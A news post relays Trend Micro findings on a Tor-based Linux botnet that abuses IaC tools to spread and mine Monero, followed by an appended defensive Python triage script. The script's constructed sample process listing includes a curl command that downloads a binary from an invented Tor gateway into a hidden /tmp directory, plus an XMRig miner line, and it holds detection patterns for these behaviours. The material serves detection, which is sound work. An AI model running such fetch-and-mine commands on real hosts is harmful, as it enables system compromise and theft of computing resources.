Tor-Based Linux Botnet Abuses IaC Tools to Spread

by Fnord666 from SoylentNews (#5H7QP)

upstart writes in with an IRC submission:

Tor-Based Linux Botnet Abuses IaC Tools to Spread:

A recently observed malware botnet targeting Linux systems is employing many of the emerging techniques among cyber-criminals, such as the use of Tor proxies, legitimate DevOps tools, and the removal of competing malware, according to new research from anti-malware vendor Trend Micro.

The researchers say the malware is capable of downloading all of the files it needs from the Tor anonymity network, including post-infection scripts and legitimate, essential binaries that might be missing from the environment, such as ss, ps, and curl.

With the help of these tools, the malware can make HTTP requests, gather information about the infected system, and even run processes.

To perpetrate the attacks, the threat actor behind the botnet maintains a big network of proxies to maintain connections between the surface web and the Tor network.

[...] The observed malware sample can remove certain cloud-related services and agents and abuse infrastructure-as-code (IaC) tools such as Ansible, Chef, and SaltStack to spread to other systems.

At the moment, the botnet deploys the XMRig Monero (XMR) miner onto the infected machines. The crypto-miner uses its own mining pool and the malware searches the system for other running miners and attempts to remove them.

[N.B. - Emphasis retained from the original]
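A host-triage heuristic for the behaviours the excerpt describes (core utilities fetched through Tor gateways into non-system paths, an XMRig-style miner, IaC tooling run from an unexpected account), added here as an illustration; it is not code from the article or from Trend Micro's research, and the indicator patterns, the admin-user list and the process listing are constructed assumptions.

```python
"""Triage heuristics over a process listing in `ps -eo pid,user,args` shape.

Indicator sets below are illustrative assumptions, not indicators published
by Trend Micro; the sample listing is constructed for this example."""
import re
from typing import Dict, List

MINER_PATTERNS = re.compile(r"xmrig|--donate-level|stratum\+tcp://", re.I)
IAC_TOOLS = {"ansible", "ansible-playbook", "knife", "salt", "salt-ssh", "salt-call"}
TOR_GATEWAY = re.compile(r"\.onion(\.\w+)?\b", re.I)   # .onion or Tor-to-web proxy hostnames
EXPECTED_BIN_DIRS = ("/bin/", "/usr/bin/", "/sbin/", "/usr/sbin/")
DROPPED_UTILS = {"ss", "ps", "curl"}                    # utilities the report says the malware fetches

def triage(ps_output: str, admin_users=("root", "deploy")) -> List[Dict[str, str]]:
    """Return one finding per matched rule per process; empty list means nothing flagged."""
    findings = []
    for line in ps_output.strip().splitlines()[1:]:      # first line is the header
        pid, user, args = line.split(None, 2)
        exe = args.split()[0]
        name = exe.rsplit("/", 1)[-1]
        if MINER_PATTERNS.search(args):
            findings.append({"pid": pid, "rule": "miner", "detail": args})
        if TOR_GATEWAY.search(args):
            findings.append({"pid": pid, "rule": "tor-gateway-fetch", "detail": args})
        # A stock utility running from /tmp or a hidden directory suggests a dropped copy
        if name in DROPPED_UTILS and not exe.startswith(EXPECTED_BIN_DIRS):
            findings.append({"pid": pid, "rule": "utility-outside-system-path", "detail": exe})
        # IaC tools are expected only from the accounts that normally run deployments
        if name in IAC_TOOLS and user not in admin_users:
            findings.append({"pid": pid, "rule": "iac-tool-unexpected-user", "detail": f"{user}: {args}"})
    return findings

# Constructed sample listing (hostnames and paths are invented)
SAMPLE_PS = """\
PID USER ARGS
1 root /sbin/init
812 root /usr/bin/ansible-playbook site.yml
2231 www-data /tmp/.X11/curl -s http://abcdefgh.onion.ly/bin/ps -o /tmp/.X11/ps
2240 www-data /tmp/.X11/ps -eo pid,args
2301 www-data /tmp/.X11/xmrig -o pool.example.invalid:3333 --donate-level 0
2355 www-data /usr/bin/salt-ssh '*' state.apply
"""

def run_sample() -> List[Dict[str, str]]:
    return triage(SAMPLE_PS)

if __name__ == "__main__":
    for f in run_sample():
        print(f"pid {f['pid']:>5}  {f['rule']:<28} {f['detail']}")
```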
